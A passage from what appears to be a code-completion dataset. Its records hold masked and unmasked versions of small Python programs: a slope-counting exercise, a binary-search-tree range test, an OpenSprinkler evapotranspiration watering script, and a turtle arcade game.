"step-4": "import sys\nsys.stdin = open('줄긋기.txt')\nT = int(input())\nfor tc in range(1, T + 1):\n N = int(input())\n dot = [list(map(int, input().split())) for _ in range(N)]\n ran = []\n for a in range(N - 1):\n for b in range(a + 1, N):\n if dot[a][1] - dot[b][1] == 0:\n if 'inf' not in ran:\n ran.append('inf')\n else:\n K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])\n if K not in ran:\n ran.append(K)\n print('#{} {}'.format(tc, len(ran)))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
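The record above keeps distinct slope values in a list and probes it with "not in", which is quadratic in the number of stored slopes. A set gives the same count directly (a sketch keeping the original's dx/dy convention; note that float division can conflate slopes that differ only beyond float precision, where Fraction would be exact):

import math

def distinct_slopes(dots):
    seen = set()
    for i in range(len(dots) - 1):
        for j in range(i + 1, len(dots)):
            dx = dots[i][0] - dots[j][0]
            dy = dots[i][1] - dots[j][1]
            seen.add(math.inf if dy == 0 else dx / dy)
    return len(seen)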
__author__ = 'lei'
import unittest
from ch3.node import TreeNode as t
import ch3.searchRange as sr
class MyTestCase(unittest.TestCase):
def test_1(self):
a = t(2)
b = t(1)
a.left = b
self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])
def test_2(self):
a = t(20)
b = t(1)
a.left = b
c = t(40)
a.right = c
d = t(35)
c.left = d
self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "c63e5a2178e82ec6e0e1e91a81145afb735bf7bf",
"index": 216,
"step-1": "<mask token>\n\n\nclass MyTestCase(unittest.TestCase):\n <mask token>\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_1(self):\n a = t(2)\n b = t(1)\n a.left = b\n self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-3": "__author__ = 'lei'\n<mask token>\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_1(self):\n a = t(2)\n b = t(1)\n a.left = b\n self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "__author__ = 'lei'\nimport unittest\nfrom ch3.node import TreeNode as t\nimport ch3.searchRange as sr\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_1(self):\n a = t(2)\n b = t(1)\n a.left = b\n self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": null,
"step-ids": [
2,
4,
5,
6
]
}
|
[
2,
4,
5,
6
] |
import os, sys, datetime, pytz, tzlocal, urllib.request, requests, csv, hashlib, json, boto3
uri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv' #Station 107 is Santa Barbara
base_et = 0.15
def main():
try:
tempfile = tempfile_name()
get_datafile(tempfile)
except:
print("Could not retrieve datafile " + tempfile)
exit(-1)
et = get_yesterdays_et(tempfile)
if et == -1.0:
        print("No et found for " + yesterday())
exit(-1)
new_water_level = int(et/base_et * 100)
print("New Water Level will be %d" % new_water_level)
status = set_os_et(new_water_level)
notify(status)
exit(0)
def yesterday():
dt = datetime.datetime.now(datetime.timezone.utc)
local_timezone = tzlocal.get_localzone()
dt = dt.astimezone(local_timezone)
delta = datetime.timedelta(1)
dt = dt - delta
return datetime.datetime.strftime(dt, "%-m/%-d/%Y")
def get_yesterdays_et(tempfile):
datestr = yesterday()
et = -1.0
with open(tempfile, 'r') as tmp:
rdr = csv.reader(tmp)
for r in rdr:
if r[1] == datestr:
et = float(r[3])
print("Found et for " + datestr + ": " + str(et))
os.remove(tempfile)
return et
def tempfile_name():
return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()) + '.csv'
def get_datafile(tempfile):
global uri
urllib.request.urlretrieve(uri, tempfile)
def get_password():
try:
pw = os.environ['OPENSPRINKLER_PASSWORD']
except:
print("OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD")
exit(-1)
pw = pw.encode('ascii')
m = hashlib.md5()
m.update(pw)
return m.hexdigest()
def set_os_et(new_water_level):
hash = get_password()
status = ""
r = requests.get('http://192.168.1.13/jo?pw=' + hash)
res = json.loads(r.text)
    status = status + "Old water level: %s\n" % res['wl']
r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash, new_water_level))
r = requests.get('http://192.168.1.13/jo?pw=' + hash)
res = json.loads(r.text)
    status = status + "Successfully set to new value %s\n" % res['wl']
return status
def notify(status):
session = boto3.Session(profile_name='trbryan')
sns = session.client('sns')
response = sns.publish(
TopicArn='arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',
Message=status,
Subject='Daily OpenSprinkler ET Adjustment',
MessageStructure='string',
)
if __name__ == "__main__": main()
|
normal
|
{
"blob_id": "4d82e68faa3102fc2949fd805588504b7d874589",
"index": 5457,
"step-1": "<mask token>\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nuri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv'\nbase_et = 0.15\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os, sys, datetime, pytz, tzlocal, urllib.request, requests, csv, hashlib, json, boto3\nuri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv'\nbase_et = 0.15\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import os, sys, datetime, pytz, tzlocal, urllib.request, requests, csv, hashlib, json, boto3\n\nuri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv' #Station 107 is Santa Barbara\nbase_et = 0.15\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print(\"Could not retrieve datafile \" + tempfile)\n exit(-1)\n\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print(\"No et found for \" + datestr)\n exit(-1)\n\n new_water_level = int(et/base_et * 100)\n print(\"New Water Level will be %d\" % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, \"%-m/%-d/%Y\")\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print(\"Found et for \" + datestr + \": \" + str(et))\n os.remove(tempfile)\n return et\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()) + '.csv'\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\"OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD\")\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = \"\"\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + \"Old water level: %s\\n\" % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash, new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + \"Successfully set to new value %s\\n\" % {res['wl']}\n return status\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(\n TopicArn='arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status,\n Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string',\n )\n\n\nif __name__ == \"__main__\": main()",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
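A minimal sketch of the water-level scaling the OpenSprinkler record above performs (base_et = 0.15 comes from the script; the 0.18 ET reading is made up for illustration):

def water_level_percent(et, base_et=0.15):
    # 100 means "water as usual"; evapotranspiration above the baseline raises it proportionally
    return int(et / base_et * 100)

print(water_level_percent(0.18))  # -> 120, i.e. water 20% more than usual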
import turtle
import random
import winsound
import sys
""" new_game = False
def toggle_new_game():
global new_game
if new_game == False:
new_game = True
else:
new_game = False """
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
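# tracer(0) switches off turtle's automatic screen refresh, so each frame below
# must redraw explicitly via wn.update()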
wn.register_shape("human.gif")
def game_loop():
score = 0
lives = 3
wn.register_shape("human.gif")
wn.register_shape("Evil-Virus.gif")
wn.register_shape("surgical-mask.gif")
# Add the player
player = turtle.Turtle()
player.speed(0)
player.shape("human.gif")
player.color("white")
player.penup()
player.goto(0, -250)
player.direction = "stop"
# Create a list of good guys
good_guys = []
# Add the good_guys
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape("surgical-mask.gif")
good_guy.color("blue")
good_guy.penup()
good_guy.goto(-100, 250)
        good_guy.speed = random.uniform(0.3, 2.0)  # overwrites Turtle.speed() with a plain float used as the fall speed (the bad guys below do the same)
good_guys.append(good_guy)
# Create a list of bad guys
bad_guys = []
# Add the bad_guys
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape("Evil-Virus.gif")
bad_guy.color("red")
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
# Make the pen
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape("square")
pen.color("white")
pen.penup()
pen.goto(0, 260)
font = ("Courier", 24, "normal")
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
# Make the message
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color("yellow")
message.penup()
message.goto(0, 0)
font = ("Calibri", 24, "bold")
message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font)
# Functions
def go_left():
player.direction = "left"
def go_right():
player.direction = "right"
def stop_player():
player.direction = "stop"
# Keyboard Binding
wn.listen()
wn.onkeypress(go_left, "Left")
wn.onkeyrelease(stop_player, "Left")
wn.onkeypress(go_right, "Right")
wn.onkeyrelease(stop_player, "Right")
while True:
# Update screen
wn.update()
# Move the player
if player.direction == "left":
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == "right":
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
# Move the good guys
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
# Check for a collision with player
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME)
# Move the bad guys
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
# Check for a collision with player
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound("game_over_sound", winsound.SND_FILENAME)
# wn.listen()
# if wn.onkeypress(toggle_new_game, "a"):
# if new_game == True:
break
# wn.onkeypress(sys.exit(), "q")
while True:
# Update screen
wn.update()
# Play music
wn.bgpic("retro_city.gif")
winsound.PlaySound("retro_video_game_music-trimmed", winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
#sys.exit()
wn.mainloop()
|
normal
|
{
"blob_id": "1593280a29b13461b13d8b2805d9ac53ce94c759",
"index": 2948,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n 
wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-3": "<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n 
